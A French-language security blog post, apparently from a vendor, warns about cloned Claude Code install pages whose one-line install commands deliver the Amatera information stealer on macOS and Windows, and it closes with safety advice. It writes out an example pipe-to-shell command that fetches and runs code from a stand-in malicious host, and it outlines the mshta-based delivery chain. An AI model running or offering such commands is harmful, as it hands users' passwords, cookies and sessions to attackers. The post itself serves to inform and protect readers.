Les attaquants clonent les pages d'installation d'outils populaires comme Claude Code et remplacent les commandes d'installation « en une ligne » par des logiciels malveillants , principalement pour voler des mots de passe, des cookies, des sessions et l'accès aux environnements de développement.
Les guides d'installation modernes vous indiquent souvent de copier une seule commande comme curl https://malware-site | bash dans votre terminal et appuyez sur Entrée. Cette habitude transforme le site web en télécommande : tout script hébergé à cette URL s’exécute avec vos permissions, souvent celles d’un administrateur.
Des chercheurs ont découvert que les attaquants exploitent cette méthode en conservant une configuration identique, ne modifiant que le point de connexion de cette ligne de code. Pour de nombreux utilisateurs non spécialistes qui débutent avec l'IA et les outils de développement, cette méthode paraît naturelle, ce qui explique leur manque de vigilance.
Mais en gros, cela revient à dire « Je fais confiance à ce domaine », et ce n'est pas une bonne idée à moins d'être absolument certain de sa fiabilité.
En général, cela se passe ainsi : quelqu’un recherche « installation de Claude Code » ou « interface de ligne de commande de Claude Code », voit un résultat sponsorisé en haut de la page avec une URL plausible et clique dessus sans trop réfléchir.
Mais cette publicité mène à une page de documentation ou de téléchargement clonée : même logo, même barre latérale, même texte et un bouton « copier » familier à côté de la commande d’installation. Dans de nombreux cas, tout autre lien sur lequel vous cliquez sur cette fausse page vous redirige discrètement vers le site du véritable fournisseur, de sorte que rien d’autre ne paraît suspect.
Similaire aux attaques ClickFix , cette méthode est appelée InstallFix . L'utilisateur exécute le code qui infecte sa propre machine, sous de faux prétextes, et la charge utile est généralement un voleur d'informations .
Dans ces attaques InstallFix inspirées de Claude Code, la charge utile principale est un voleur d'informations nommé Amatera. Ce logiciel malveillant cible les données du navigateur telles que les mots de passe enregistrés, les cookies, les jetons de session, les données de remplissage automatique et les informations système générales permettant aux attaquants de profiler l'appareil. Grâce à ces informations, ils peuvent détourner les sessions web et se connecter aux tableaux de bord cloud et aux panneaux d'administration internes sans jamais avoir besoin de votre mot de passe. Certains rapports font également état d'un intérêt pour les portefeuilles de cryptomonnaies et autres comptes à forte valeur ajoutée.
Windows et Mac
La campagne basée sur le code Claude que les chercheurs ont découverte était conçue pour cibler à la fois Windows et Mac utilisateurs.
Sur macOS, le script malveillant, composé d'une seule ligne de code, récupère généralement un script de seconde étape depuis un domaine contrôlé par l'attaquant. Ce script est souvent obfusqué en base64 pour paraître complexe mais inoffensif au premier abord. Il télécharge ensuite un fichier binaire depuis un autre domaine, le rendant exécutable après en avoir supprimé les attributs.
Sur Windows , la commande a été vue en train de générer cmd.exe, qui appelle ensuite mshta.exe avec une URL distante. Cela permet au logiciel malveillant de s'exécuter comme un fichier binaire Microsoft de confiance plutôt que comme un exécutable aléatoire. Dans les deux cas, rien de spectaculaire n'apparaît à l'écran : vous pensez avoir installé un simple outil, tandis que la véritable charge utile se met silencieusement à l'œuvre en arrière-plan.
Comment rester en sécurité
Avec ClickFix et InstallFix qui sévissent à grande vitesse — et qui ne semblent pas prêts de disparaître de sitôt —, il est important d'être vigilant, prudent et protégé.
- Prenez votre temps. Ne vous précipitez pas pour suivre les instructions d'une page web ou d'une fenêtre, surtout si elles vous demandent d'exécuter des commandes sur votre appareil ou de copier-coller du code. Analysez le fonctionnement de la commande avant de l'exécuter.
- Évitez d'exécuter des commandes ou des scripts provenant de sources non fiables. Ne jamais exécuter de code ou de commandes copiés depuis des sites web, des courriels ou des messages, sauf si vous faites confiance à la source et comprenez le but de l'action. Vérifiez les instructions par vous-même. Si un site web vous demande d'exécuter une commande ou d'effectuer une action technique, consultez la documentation officielle ou contactez l'assistance avant de poursuivre.
- Limitez l'utilisation du copier-coller pour les commandes. Saisir les commandes manuellement plutôt que de les copier-coller permet de réduire le risque d'exécuter involontairement des charges utiles malveillantes dissimulées dans du texte copié.
- Sécurisez vos appareils. Utilisez une solution anti-malware à jour et en temps réel, dotée d'un module de protection web.
- Informez-vous sur l'évolution des techniques d'attaque. Comprendre que les attaques peuvent provenir de sources inattendues et évoluer permet de rester vigilant. Continuez à lire notre blog !
Astuce de pro : Saviez-vous que l’extension gratuite Malwarebytes Browser Guard vous avertit lorsqu’un site Web tente de copier des données dans votre presse-papiers ?
Du signalement des menaces à leur suppression.
Les risques de cybersécurité ne devraient jamais dépasser le stade de la simple mention dans les médias. Protégez vos appareils des menaces en téléchargeant Malwarebytes dès aujourd'hui .




